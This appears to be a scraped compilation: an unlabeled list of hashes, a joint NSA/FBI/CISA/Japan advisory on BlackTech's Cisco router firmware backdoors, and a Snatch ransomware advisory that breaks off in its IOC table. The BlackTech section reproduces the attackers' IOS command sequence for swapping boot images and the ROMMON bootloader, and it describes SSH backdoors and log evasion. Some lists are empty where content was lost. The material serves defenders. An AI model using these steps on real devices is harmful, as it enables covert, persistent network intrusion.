0092ce298a1d451fbe93dc4237053a96
00e872019b976e69a874ee7433038754
01ecd9ab9be75e832c83c082be3bdf18
0212a88c7ed149febdefa347c610b248
02be3b93640437dbba47cc7ed5ab7895
03f8852448a85e14f2b4362194160c32
045f8ccdac6d4e769b30da406808da71
04e7f5787f89a597001b50a37b9f8078
070f9fe9f0ec69e6b8791d280fde6a48
07a624d7236cca3934cf1f8e44b74b52
09df72c01a1a0ad193e2fff8e454c9c4
0b28842d64a344c287e6165647f3b3fe
0b8e1211de50d244b89e6c1b366d3ccf
0cb0380cf75a863b3e40a0955b1ada9f
0da24834056873a8cd8311000088e8be
0e1fad8ffaa7a939f0a6cbf9cd7e2fcd
0f6e78839398c245d13f696a3216d840
119f8c9050d1499b6f958b857868b8ce
11c506d5e3fb7e119c4287202c96a930
1336df27f94b25a25acac9db3e61e461
14671c3f8deca7d73a03b74cb854c21d
146caf9bd0153428f54e9ef472154983
14994353f3ea6fd25952a8c7d57f9ecf
151bc875df15d1385e6eb02f9edaba06
15a074a397727b26a846b443b99c20ff
1660f3d882a4311ca013ee4586e01fd9
16a74fc216f8a4ce43466bb83b6d3fd2
188623fdd056c4ed13d1ff34c7377637
19f51486abd40c9f0fc0503559a6c523
1a024e63721c610d2e54e67d62cd5460
1aa7dae8f2ae0a29402ed51819f82db4
1abfdeaadb74a0f7c461e7bab157b17f
1b6720ed0b67c910a80722ce973d6217
1b7d9368c6ce7623fdbc43f013626535
1e0850e10a00c9bbdd5c582ff4cb6833
1ec71612e438cf902913eec993475eb9
206fed3a39d9215c35395663f5bb3307
22cc1b3bc9f99d3a520ae58fee79a0d5
23e3e6fa8b23d9bc19e82de4e64c79e9
253fd4659bf21be116858bc0f206c5b9
276e175d4fe8454c4c47e966d8cb3fa3
289a450c7478dd52a10c6ed2fb47f7e9
2aa8ba7478b1362274666d714df575bc
2beecb6b9e386f29d568229a9953c3d2
2ebc7fdceaa9a0df556e989d77157006
3003024afe64b4e8a5a30825c14bbb12
3082e669dda9d023e2dcd8b9549a84a8
309d33c6f77a3fc75654c44c61596ccd
30a9f568eb3df79352fc587a078623b6
30be84e6b95f44c203f8e7fce7339a8e
3268a5097a543c7dbd82c39a9193b7fe
32775ead3ea1ad7db2f4bea67fe0cabb
34ac9a6ef5d285119abec50fbe41fcfe
34d92552e278710c1e84f0bd8dc3a6b8
361f47a6357cc6e3a9bcdd20cfaaf0e9
3685abc75517e61e47e52e5f2d060f54
3744004013135b9f9a05cb58cda8134d
37d952966ea7e79277803f13d7147544
391a4c2c7541b8b78e2f99bf586e9794
393662e5aa0cb49c5d666a6d10a1ade6
3962b622c5aa815afb803b92aa948424
3b22af324abded2781ed8f6a61f3654f
3b30b4555cc8b4b164ad03cf322cbea8
3bd1bdb5e90b9590a8878bff2ada8204
3be529eb3a7daaf34f963a22188f6139
3dd13faad1c45eb0c23e4567210f7eac
403273b51f91cf3c333695e5532cb2c3
404f56045e436d53ead2177bf957ba39
41854adbc73b0b58e5c566f60bb0df25
43c22dabb1e6d2449a39c2f7e974d537
476e72bbda5b78d188766139889e3038
4898a51256ae7d914a5ffd5695973470
49230c486f0fd383cd301fe162d6a786
4959a611b9885022d81b4bc8e4b1d149
495c6ff7ca0379ad0891bac47917d09a
49d2bd08038dc7dada221008591940f9
4c1b73ec52e6eec0c5d20577fcbc9ef1
4d34db639ba84b11822fb3dac47ed7d1
5244b163f9326a1e5eaa8860f7543f99
539f1a5183800a96228458932f9307f7
5466368d4659f1b1470bcb09e65b484d
549cde6535a884126755fc53f59a820c
555389e92c622b87d3fc395fd8723501
588d0b42e54174a98e1eca59945e8b32
58bc21d305a65c41745327f142f3ac12
59401c9a60449c742d073d93d1b7039a
59eec218522cc5c7743a0d37892a3345
59faf75430e9326d3ae9d231bb3ae8c6
5d0259ca16cfc2d7d1b0fac69f29ab05
5d55026fb84dba91ac01e2095504b1bc
5e35f50c692081fd6c7ddac1272e2d6c
5f4d5965af741bba59b7c8d3425f33dd
6010282004917ecf3900babf61456432
6088c2a04c94cdcd5a283a6d1622ffba
61dee38d2f97220efb1218ad8971e3ab
62ac194f2526eb45485526bca35c8f43
634296a023280d020674c873d0199760
635755dadfab8b92fb502aafb09122db
63fc58be0d7b48eaa34da7f752ae8ae6
6441640409815cfb4bf469e685e1bdb5
646973d1928c401ba80961c12cbf84a2
65eef0a0ee257254ef0418aa57192cfb
66f6a192083a7ab00ae8e0b5cc52e8f4
67a42e2e27ffc26d1f3d0ceb8384afd0
689385f1218e0d4c347595648ca6a776
692f91c0c5e9e93e0a24bd3392887ca1
69ecf52960c8bd9e746dfe9ee19c11f6
6e359f3bbc622e9b1ed36f6e3d521bcf
6e3650528f719fc50988a1f697644832
6ead0d5d3f87911c27f3ae0a75e6b5bc
6f1fa8b444caf0d8238f948279ca74e1
6fb8cdf567dd7d89d53b5771d769cb5f
706b6055658aff067ae370f23831ef6b
708140c311d3d69418f75c928e7535a0
719ec5da8f2153a436ee8567ff609894
7292ef4cdca529071fad97496e1c9439
74871691eac48156ce0da2cfa3ab401a
74cf24f2a66a31c88b6fcfe01f12160c
75e874d8e0a79697633b87ea5e798b1c
76c0d09fed2f33babb0de8ee2c07144c
77a01363fa2b29af25c004da9570e23c
78988c65e9b70e7929e747408d8f0b0e
79c6d12d168b85437384b20eb94e106b
7b4137b4e85f31a81bb5bafeda993947
7b9db1d58326c1fa276ba2a39bcc2617
7cbc7459db5327c26476549f225030f5
7cd727171c2522f51417edeeba4f1791
7e3630c67c802eabb67b108ad4d7ded7
802f5d34c230da40c0912a1c5a9b702b
80bd0f3610f6c4d60584a5be0b8a3016
819030799f0020ed724c2ef3ffaa56c6
8207129585da68066ed08e94216d76ee
821f649d08687e22f96cea99fbb5d3a3
830838cb0620d659405a74401cd72557
833d3201066f5184c874c73a2083c448
840f488b7c0a5d686d1e89908735f354
84301b967a4d9a242466c04901bad691
85c3fac6a9885362c448f434671e362f
883b9fe16e45c388968defc73a5fba7a
8a6b0ba3496eeca39d6d3f9bae830c90
8ad0fd4b78c89bd63b97343fda1eeccb
8b0ae9029974091df12210255aaecad6
8b297f8b219e968932293ee7a8242ca3
8bb1781e756a53cd00d9b2ec670fa21e
8d5515351afdf27b013f96a05bf45147
8fafa73e9985e05d0c1c964da770c567
905967b08bd44cfa60d969229921ac23
9188ef45ea917a91ec9b92b5dd8cd90d
918dfab0333ae15d61f14fd24b5eaaac
922a3272aad17c9eaad733696a4321da
9253399537fad8448f1d4732dd79f6fa
934a8a6528e91caa019acb76e791a71d
95588e0386206fa02912cfcaf18c1220
9610328cdaa4694800c2c93410f8ce82
9622902cc43f4a20d0d686a37e4d8232
96c41e4c4a1812187fb279b9299ad63b
984c4653a563b19c87f264611a6adc01
9980febfaf901d4113a1c473f79d7eb6
9a176d818edff838fc057cea3ee372c0
9ba21c5148913186a5bf877078cbc048
9cfda02ef7e04c469b77f8197a249c17
9d74d395bd2f72a47a5c980e6040df5a
9df128ebe0c82064aa746647883112c9
9e5613533972a9d42d2e3344a4e58566
9ec17429eed5446e3720796ab50d8c60
9f2438aaab4744c4b7b5b7287a783099
9f3bf94572344b36f6ef1689cb30c66e
9fdd7a85b3a4ef8ded73beb3e6218109
a1b732a9af792f75a68ed78d72ffb8f6
a260d836428cdb971bdf147ca6940160
a4f11b1eb659869a0ae70898a4a0e5ee
a596ebbcf438980c880d711315e4fdf1
a80b6a354b493264f37aa39d0d41b5fc
a89df6156eb5a2de196388d4a123b470
a96837fe533247abb7f88000d0216a50
a98cf0a359f430a00f4f3d522f5b6cc0
aa2fe3a253e169b05e1782ca57a688d2
aef0172a2c03f77912de0bbf14aee00f
af06c3e72f2f307515ba549174d8e5a6
b311ab82b30f41b12cb9089d00c4a1ff
b4f31423445b5f13675f205ac997f41f
b50666c9aed1c2f222c56b6e9b326d27
b53f179b3f25f72bb0c7ccf45bf8beee
b57f3e41c03803306b0ee2111f7ef823
b79434613820faf30d58f103c4415a29
b8366aaa5ed51c0dea3fc90ef7e14889
b8f6b0d234a305c25411e83fd430c624
b956ed2b848dabb4e79ab7358233861b
b9ecb08402df0f1f6e1ce76b8ad6e91f
ba4a616c8d4ab9358a82b321d8e618bf
bcd62f3e029f96f62c24d50d2d1402ac
bcf75736d176394f3df69f3e0ef7dd9f
be1f24457141d80206bc2e58f55dc879
c013f308d170aa2eca4a5b0f0bbd3ccb
c0a2fd066c955137036f92da2c3a3ff1
c17b3ec40ed5216e44311138aafaea2c
c262a39f49604f05a5656213f758cd46
c66f36eb180438882133717c3abb5157
c986c7bf720ce1463c3d628d2b3dad01
c9c16287cbbe5a037244e374ba84aecc
cbcd728a2350712b5747cd3447473deb
cbeeb123efe8cf7f842426b673415c28
ccb15eef4287c8efa472915bcb4ec458
ccdddb69e9344a039c4ac9c49a6f2d7b
cd1312be032256a10cf866af3e9afae9
ce0dd163d9e02bfd42d61024523cb134
ceef2e728db1b5ae15432f844eeb66e1
d12d98a0877f6e3c8b5a59f41cc4de9b
d131f17689f1f585e9bfdcdb72a626bb
d173076d97a0400a56c81089912b9218
d255291bb8e460626cb906ebacc670e5
d2cea317778ad6412c458a8a33b964fd
d3cfee76468a9556fd9d017c1c8ee028
d3d72f4c7038f7313ad0570e16c293bf
d485a1b5db2f97dc56500376d677aa89
d662d20507bebc37b99a4d413afa2752
d711d577b9943ab4e2f8a2e06bb963e3
d92e87d2689957765987e2be732d728e
d966c6c822122e96f6e9f5f1d4778391
daee31d7cc6e08ead6afad2175989e1d
dbb293176747fa1c2e03cbc09433f236
dc26ef761c7ec40591b1fe6e561b521d
dc9e6edeb7557bc80be68be15cebb77a
dddfbae77336120febd5ad690af3e341
e1f579227327ebb21cde3f9e7511db01
e3c642432a815a07f035e01308aaa8fc
e54329351788661f2a8d4677a759fc42
e82b7ad2c05f4617efbc86a78c1e61e9
e99cffa2afa064625f09e1c5aca8f961
ea6bd3db104ca210b5ad947d46134aaf
eb277d809a59d39d02605c0edd9333e9
ed82a50d98700179c8ae70429457477a
ef35374f4146b3532f0902d6f7f0ef8c
ef4c4d79f02ac404f47513d3a73e20c7
f05a5a60ad6f92d6f28fa4f13ded952f
f0776dfe17867709fdb0e0183ed71698
f20fbfd508e24d50522eadf0186b03eb
f3d751b0585855077b46dfce226cfea1
f4dd9bb28d680a3368136fb3755e7ea9
f804388f302af1f999e4664543c885a1
f8bcc8f99a3afde66d7f5afb5d8f1b43
f8d6f89aecf792e844e72015c9f27c95
f967460f8c6de1cedb180c90c98bfe98
f9d5cc0cbae77ea1a371131f62662b6b
fa4f1a3b215888bc5f19b9f91ba37519
fdff2bf247a7dad40bac228853d5a661
fe6e7fac4f0b4f25d215e28ca8a22957
fe9de1cdd645971c5d15ee1873c3ff8d
febba89b4b9a9649b3a3bf41c4c7d853
People’s Republic of China-Linked Cyber Actors Hide in Router Firmware
Executive Summary
The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Japan National Police Agency (NPA), and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC) (hereafter referred to as the “authoring agencies”) are releasing this joint cybersecurity advisory (CSA) to detail activity of the People’s Republic of China (PRC)-linked cyber actors known as BlackTech. BlackTech has demonstrated capabilities in modifying router firmware without detection and exploiting routers’ domain-trust relationships for pivoting from international subsidiaries to headquarters in Japan and the U.S. — the primary targets. The authoring agencies recommend implementing the mitigations described to detect this activity and protect devices from the backdoors the BlackTech actors are leaving behind.
BlackTech (a.k.a. Palmerworm, Temp.Overboard, Circuit Panda, and Radio Panda) actors have targeted government, industrial, technology, media, electronics, and telecommunication sectors, including entities that support the militaries of the U.S. and Japan. BlackTech actors use custom malware, dual-use tools, and living off the land tactics, such as disabling logging on routers, to conceal their operations. This CSA details BlackTech’s tactics, techniques, and procedures (TTPs), which highlights the need for multinational corporations to review all subsidiary connections, verify access, and consider implementing Zero Trust models to limit the extent of a potential BlackTech compromise.
For more information on the risks posed by this deep level of unauthorized access, see the CSA People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices.[1]
Download the PDF version of this report: PDF, 808 KB
Technical Details
This advisory uses the MITRE® ATT&CK® for Enterprise framework, version 13.1. See the Appendix: MITRE ATT&CK Techniques for all referenced TTPs.
Background
Active since 2010, BlackTech actors have historically targeted a wide range of U.S. and East Asia public organizations and private industries. BlackTech actors’ TTPs include developing customized malware and tailored persistence mechanisms for compromising routers. These TTPs allow the actors to disable logging [T1562] and abuse trusted domain relationships [T1199] to pivot between international subsidiaries and domestic headquarters’ networks.
Observable TTPs
BlackTech cyber actors use custom malware payloads and remote access tools (RATs) to target victims’ operating systems. The actors have used a range of custom malware families targeting Windows®, Linux®, and FreeBSD® operating systems. Custom malware families employed by BlackTech include:
BlackTech actors continuously update these tools to evade detection [TA0005] by security software. The actors also use stolen code-signing certificates [T1588.003] to sign the malicious payloads, which makes the payloads appear legitimate and therefore more difficult for security software to detect [T1553.002].
BlackTech actors use living off the land TTPs to blend in with normal operating system and network activities, allowing them to evade detection by endpoint detection and response (EDR) products. Common methods of persistence on a host include NetCat shells, modifying the victim registry [T1112] to enable the remote desktop protocol (RDP) [T1021.001], and secure shell (SSH) [T1021.004]. The actors have also used SNScan for enumeration [TA0007], and a local file transfer protocol (FTP) server [T1071.002] to move data through the victim network. For additional examples of malicious cyber actors living off the land, see People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection.[2]
Pivoting from international subsidiaries
The PRC-linked BlackTech actors target international subsidiaries of U.S. and Japanese companies. After gaining access [TA0001] to the subsidiaries’ internal networks, BlackTech actors are able to pivot from the trusted internal routers to other subsidiaries of the companies and the headquarters’ networks. BlackTech actors exploit trusted network relationships between an established victim and other entities to expand their access in target networks.
Specifically, upon gaining an initial foothold into a target network and gaining administrator access to network edge devices, BlackTech cyber actors often modify the firmware to hide their activity across the edge devices to further maintain persistence in the network. To extend their foothold across an organization, BlackTech actors target branch routers—typically smaller appliances used at remote branch offices to connect to a corporate headquarters—and then abuse the trusted relationship [T1199] of the branch routers within the corporate network being targeted. BlackTech actors then use the compromised public-facing branch routers as part of their infrastructure for proxying traffic [TA0011], blending in with corporate network traffic, and pivoting to other victims on the same corporate network [T1090.002].
Maintaining access via stealthy router backdoors
BlackTech has targeted and exploited various brands and versions of router devices. TTPs against routers enable the actors to conceal configuration changes, hide commands, and disable logging while BlackTech actors conduct operations. BlackTech actors have compromised several Cisco® routers using variations of a customized firmware backdoor [T1542.004]. The backdoor functionality is enabled and disabled through specially crafted TCP or UDP packets [T1205]. This TTP is not solely limited to Cisco routers, and similar techniques could be used to enable backdoors in other network equipment.
In some cases, BlackTech actors replace the firmware for certain Cisco IOS®-based routers with malicious firmware. Although BlackTech actors already had elevated privileges [TA0004] on the router to replace the firmware via command-line execution, the malicious firmware is used to establish persistent backdoor access [TA0003] and obfuscate future malicious activity. The modified firmware uses a built-in SSH backdoor [T1556.004], allowing BlackTech actors to maintain access to the compromised router without BlackTech connections being logged [T1562.003]. BlackTech actors bypass the router’s built-in security features by first installing older legitimate firmware [T1601.002] that they then modify in memory to allow the installation of a modified, unsigned bootloader and modified, unsigned firmware [T1601.001]. The modified bootloader enables the modified firmware to continue evading detection [T1553.006]; however, it is not always necessary.
BlackTech actors may also hide their presence and obfuscate changes made to compromised Cisco routers by hiding Embedded Event Manager (EEM) policies—a feature usually used in Cisco IOS to automate tasks that execute upon specified events—that manipulate Cisco IOS Command-Line Interface (CLI) command results. On a compromised router, the BlackTech-created EEM policy waits for specific commands to execute obfuscation measures or deny execution of specified legitimate commands. This policy has two functions: (1) to remove lines containing certain strings in the output of specified, legitimate Cisco IOS CLI commands [T1562.006], and (2) to prevent the execution of other legitimate CLI commands, such as hindering forensic analysis by blocking copy, rename, and move commands for the associated EEM policy [T1562.001].
Firmware replacement process
BlackTech actors utilize the following file types to compromise the router. These files are downloaded to the router via FTP or SSH.
File Type
Description
Old Legitimate Firmware
The IOS image firmware is modified in memory to allow installation of the Modified Firmware and Modified Bootloader.
Modified Firmware
The firmware has a built-in SSH backdoor, allowing operators to have unlogged interaction with the router.
Modified Bootloader
The bootloader allows Modified Firmware to continue evading the router’s security features for persistence across reboots. In some cases, only modified firmware is used.
BlackTech actors use the Cisco router’s CLI to replace the router’s IOS image firmware. The process begins with the firmware being modified in memory—also called hot patching—to allow the installation of a modified bootloader and modified firmware capable of bypassing the router’s security features. Then, a specifically constructed packet triggers the router to enable the backdoor that bypasses logging and the access control list (ACL). The steps are as follows:
! Cisco IOS CLI sequence reproduced from the advisory; the "[filename]" placeholders are
! the advisory's own, not real image names. The text before this listing describes two
! image swaps (an old legitimate image that is hot-patched in memory, then a modified
! image plus modified bootloader); this listing does not label which block is which, so
! the mapping below is presumed — confirm against the original PDF.
! Defender view: each "boot system" change followed by "write" and "reload", and the
! final "upgrade rom" command, is an observable event. The advisory's detection guidance
! is to monitor network devices for unauthorized bootloader/firmware image downloads and
! for reboots.
config t
! replace the configured boot image: remove the existing entry, then add the new one
no boot system usbflash0 [filename]
boot system usbflash0 [filename]
end
! persist the configuration and reboot into the newly selected image
write
reload
conf t
! second image swap (presumably the modified firmware; see the table above)
no boot system usbflash0 [filename]
boot system usbflash0 [filename]
end
write
! bootloader (ROMMON) replacement; "bootloader" here appears to be a placeholder name
upgrade rom file bootloader
Modified bootloader
To allow the modified bootloader and firmware to be installed on Cisco IOS without detection, the cyber actors install an old, legitimate firmware and then modify that running firmware in memory to bypass firmware signature checks in the Cisco ROM Monitor (ROMMON) signature validation functions. The modified version’s instructions allow the actors to bypass functions of the IOS Image Load test and the Field Upgradeable ROMMON Integrity test.
Modified firmware
BlackTech actors install modified IOS image firmware that allows backdoor access via SSH to bypass the router’s normal logging functions. The firmware consists of a Cisco IOS loader that will load an embedded IOS image.
BlackTech actors hook several functions in the embedded Cisco IOS image to jump to their own code. They overwrite existing code to handle magic packet checking, implement an SSH backdoor, and bypass logging functionality on the compromised router. The modified instructions bypass command logging, IP address ACLs, and error logging.
To enable the backdoor functions, the firmware checks for incoming trigger packets and enables or disables the backdoor functionality. When the backdoor is enabled, associated logging functions on the router are bypassed. The source IP address is stored and used to bypass ACL handling for matching packets. The SSH backdoor includes a special username that does not require additional authentication.
Detection and Mitigation Techniques
To detect and mitigate this BlackTech malicious activity, the authoring agencies strongly recommend the following detection and mitigation techniques. It would be trivial for the BlackTech actors to modify values in their backdoors that would render specific signatures of this router backdoor obsolete. For more robust detection, network defenders should monitor network devices for unauthorized downloads of bootloaders and firmware images and for unexpected reboots. Network defenders should also monitor for unusual traffic destined to the router, including SSH.
The following are the best mitigation practices to defend against this type of malicious activity:
Note: An adversary with unauthorized privileged level access to a network device could revert this configuration change.[3]
Works Cited
[1] Joint CSA, People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices, https://media.defense.gov/2022/Jun/07/2003013376/-1/-1/0/CSA_PRC_SPONSORED_CYBER_ACTORS_EXPLOIT_NETWORK_PROVIDERS_DEVICES_TLPWHITE.PDF
[2] Joint CSA, People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection, https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_PRC_State_Sponsored_Cyber_Living_off_the_Land_v1.1.PDF
[3] NSA, Network Infrastructure Security Guide, https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF
[4] NSA, Performing Out-of-Band Network Management, https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF
[5] Cisco, Attackers Continue to Target Legacy Devices, https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
Disclaimer of endorsement
The information and opinions contained in this document are provided “as is” and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government or Japan, and this guidance shall not be used for advertising or product endorsement purposes.
Trademark recognition
Cisco and Cisco IOS are registered trademarks of Cisco Technology, Inc.
FreeBSD is a registered trademark of The FreeBSD Foundation.
Linux is a registered trademark of Linus Torvalds.
MITRE and MITRE ATT&CK are registered trademarks of The MITRE Corporation.
Windows is a registered trademark of Microsoft Corporation.
Purpose
This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate cyber threats, and to develop and issue cybersecurity specifications and mitigations.
Contact
NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov
NSA’s Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov
U.S. organizations: Report incidents and anomalous activity to CISA 24/7 Operations Center at Report@cisa.dhs.gov, cisa.gov/report, or (888) 282-0870 and/or to the FBI via your local FBI field office.
Appendix: MITRE ATT&CK Techniques
See Tables 2-9 for all referenced BlackTech tactics and techniques in this advisory.
Technique Title
ID
Use
Obtain Capabilities: Code Signing Certificates
T1588.003
BlackTech actors use stolen code-signing certificates to sign payloads and evade defenses.
Technique Title
ID
Use
Initial Access
TA0001
BlackTech actors gain access to victim networks by exploiting routers.
Trusted Relationship
T1199
BlackTech actors exploit trusted domain relationships of routers to gain access to victim networks.
Technique Title
ID
Use
Persistence
TA0003
BlackTech actors gain persistent access to victims’ networks.
Traffic Signaling
T1205
BlackTech actors send specially crafted packets to enable or disable backdoor functionality on a compromised router.
Pre-OS Boot: ROMMONkit
T1542.004
BlackTech actors modify router firmware to maintain persistence.
Technique Title
ID
Use
Privilege Escalation
TA0004
BlackTech actors gain elevated privileges on a victim’s network.
Technique Title
ID
Use
Defense Evasion
TA0005
BlackTech actors configure their tools to evade detection by security software and EDR.
Modify Registry
T1112
BlackTech actors modify the victim’s registry.
Impair Defenses
T1562
BlackTech actors disable logging on compromised routers to avoid detection and evade defenses.
Impair Defenses: Impair Command History Logging
T1562.003
BlackTech actors disable logging on the compromised routers to prevent logging of any commands issued.
Modify System Image: Patch System Image
T1601.001
BlackTech actors modify router firmware to evade detection.
Technique Title
ID
Use
Discovery
TA0007
BlackTech actors use SNScan to enumerate victims’ networks and obtain further network information.
Technique Title
ID
Use
Remote Services: Remote Desktop Protocol
T1021.001
BlackTech actors use RDP to move laterally across a victim’s network.
Remote Services: SSH
T1021.004
BlackTech actors use SSH to move laterally across a victim’s network.
Technique Title
ID
Use
Command and Control
TA0011
BlackTech actors compromise and control a victim’s network infrastructure.
Application Layer Protocol: File Transfer Protocols
T1071.002
BlackTech actors use FTP to move data through a victim’s network or to deliver scripts for compromising routers.
Proxy
T1090
BlackTech actors use compromised routers to proxy traffic.
#StopRansomware: Snatch Ransomware
SUMMARY
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known ransomware IOCs and TTPs associated with the Snatch ransomware variant identified through FBI investigations as recently as June 1, 2023.
Since mid-2021, Snatch threat actors have consistently evolved their tactics to take advantage of current trends in the cybercriminal space and leveraged successes of other ransomware variants’ operations. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB), Food and Agriculture, and Information Technology sectors. Snatch threat actors conduct ransomware operations involving data exfiltration and double extortion. After data exfiltration often involving direct communications with victims demanding ransom, Snatch threat actors may threaten victims with double extortion, where the victims’ data will be posted on Snatch’s extortion blog if the ransom goes unpaid.
FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
First appearing in 2018, Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Originally, the group was referred to as Team Truniger, based on the nickname of a key group member, Truniger, who previously operated as a GandCrab affiliate. Snatch threat actors use a customized ransomware variant notable for rebooting devices into Safe Mode [T1562.009], enabling the ransomware to circumvent detection by antivirus or endpoint protection, and then encrypting files when few services are running.
Snatch threat actors have been observed purchasing previously stolen data from other ransomware variants in an attempt to further exploit victims into paying a ransom to avoid having their data released on Snatch’s extortion blog. Note: Since November 2021, an extortion site operating under the name Snatch served as a clearinghouse for data exfiltrated or stolen from victim companies on Clearnet and TOR hosted by a bulletproof hosting service. In August 2023, individuals claiming to be associated with the blog gave a media interview claiming the blog was not associated with Snatch ransomware and “none of our targets has been attacked by Ransomware Snatch…”, despite multiple confirmed Snatch victims’ data appearing on the blog alongside victims associated with other ransomware groups, notably Nokoyawa and Conti.[1]
Initial Access and Persistence
Snatch threat actors employ several different methods to gain access to and maintain persistence on a victim’s network. Snatch affiliates primarily rely on exploiting weaknesses in Remote Desktop Protocol (RDP) [T1133] for brute-forcing and gaining administrator credentials to victims’ networks [T1110.001]. In some instances, Snatch affiliates have sought out compromised credentials from criminal forums/marketplaces [T1078].
Snatch threat actors gain persistence on a victim’s network by compromising an administrator account [T1078.002] and establishing connections over port 443 [T1071.001] to a command and control (C2) server located on a Russian bulletproof hosting service [T1583.003]. Per IP traffic from event logs provided by recent victims, Snatch threat actors initiated RDP connections from a Russian bulletproof hosting service and through other virtual private network (VPN) services [T1133].
Data Discovery and Lateral Movement
Snatch threat actors were observed using different TTPs to discover data, move laterally, and search for data to exfiltrate. Snatch threat actors use sc.exe to configure, query, stop, start, delete, and add system services using the Windows Command line. In addition to sc.exe, Snatch threat actors also use tools such as Metasploit and Cobalt Strike [S0154].
Prior to deploying the ransomware, Snatch threat actors were observed spending up to three months on a victim’s system. Within this timeframe, Snatch threat actors exploited the victim’s network [T1590], moving laterally across the victim’s network with RDP [T1021.001] for the largest possible deployment of ransomware and searching for files and folders [T1005] for data exfiltration [TA0010] followed by file encryption [T1486].
Defense Evasion and Execution
During the early stages of ransomware deployment, Snatch threat actors attempt to disable antivirus software [T1562.001] and run an executable as a file named safe.exe or some variation thereof. In recent victims, the ransomware executable’s name consisted of a string of hexadecimal characters which match the SHA-256 hash of the file in an effort to defeat rule-based detection [T1036]. Upon initiation, the Snatch ransomware payload queries and modifies registry keys [T1012][T1112], uses various native Windows tools to enumerate the system [T1569.002], finds processes [T1057], and creates benign processes to execute Windows batch (.bat) files [T1059.003]. In some instances, the program attempts to remove all the volume shadow copies from a system [T1490]. After the execution of the batch files, the executable removes the batch files from the victim’s filesystem [T1070.004].
The Snatch ransomware executable appends a series of hexadecimal characters to each file and folder name it encrypts—unique to each infection—and leaves behind a text file titled HOW TO RESTORE YOUR FILES.TXT in each folder. Snatch threat actors communicate with their victims through email and the Tox communication platform based on identifiers left in ransom notes or through their extortion blog. Since November 2021, some victims reported receiving a spoofed call from an unknown female who claimed association with Snatch and directed them to the group’s extortion site. In some instances, Snatch victims had a different ransomware variant deployed on their systems, but received a ransom note from Snatch threat actors. As a result, the victims’ data is posted on the ransomware blog involving the different ransomware variant and on the Snatch threat actors’ extortion blog.
Indicators of Compromise (IOCs)
The Snatch IOCs detailed in this section were obtained through FBI investigations from September 2022 through June 2023.
Email Domains and Addresses
Since 2019, Snatch threat actors have used numerous email addresses to email victims. Email addresses used by Snatch threat actors are random but usually originate from one of the following domains listed in Tables 1 and 2:
Email Domains
sezname[.]cz
cock[.]li
airmail[.]cc
Table 2 shows a list of legitimate email domains offering encrypted email services that have been used by Snatch threat actors. These email domains are all publicly available and legal. The use of these email domains by a threat actor should not be attributed to the email domains, absent specific articulable facts tending to show they are used at the direction or under the control of a threat actor.
Email Domains
tutanota[.]com / tutamail[.]com / tuta[.]io
mail[.]fr
keemail[.]me
protonmail[.]com / proton[.]me
swisscows[.]email
The email addresses listed in Table 3 were reported by recent victims.
Email Addresses
sn.tchnews.top@protonmail[.]me
funny385@swisscows[.]email
funny385@proton[.]me
russellrspeck@seznam[.]cz
russellrspeck@protonmail[.]com
Mailz13MoraleS@proton[.]me
datasto100@tutanota[.]com
snatch.vip@protonmail[.]com
TOX Messaging IDs
CAB3D74D1DADE95B52928E4D9DFC003FF5ADB2E082F59377D049A91952E8BB3B419DB2FA9D3F
7229828E766B9058D329B2B4BC0EDDD11612CBCCFA4811532CABC76ACF703074E0D1501F8418
83E6E3CFEC0E4C8E7F7B6E01F6E86CF70AE8D4E75A59126A2C52FE9F568B4072CA78EF2B3C97
0FF26770BFAEAD95194506E6970CC1C395B04159038D785DE316F05CE6DE67324C6038727A58
NOTE: According to ransom notes, this is a “Customer service” TOX to reach out to if the original TOX ID does not respond.
Folder Creation
C:\$SysReset
Filenames
SHA-256
qesbdksdvnotrjnexutx.bat
0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f
eqbglqcngblqnl.bat
1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d
safe.exe
5950b4e27554585123d7fca44e83169375c6001201e3bf26e57d079437e70bcd
safe.exe
7018240d67fd11847c7f9737eaaae45794b37a5c27ffd02beaacaf6ae13352b3
safe.exe
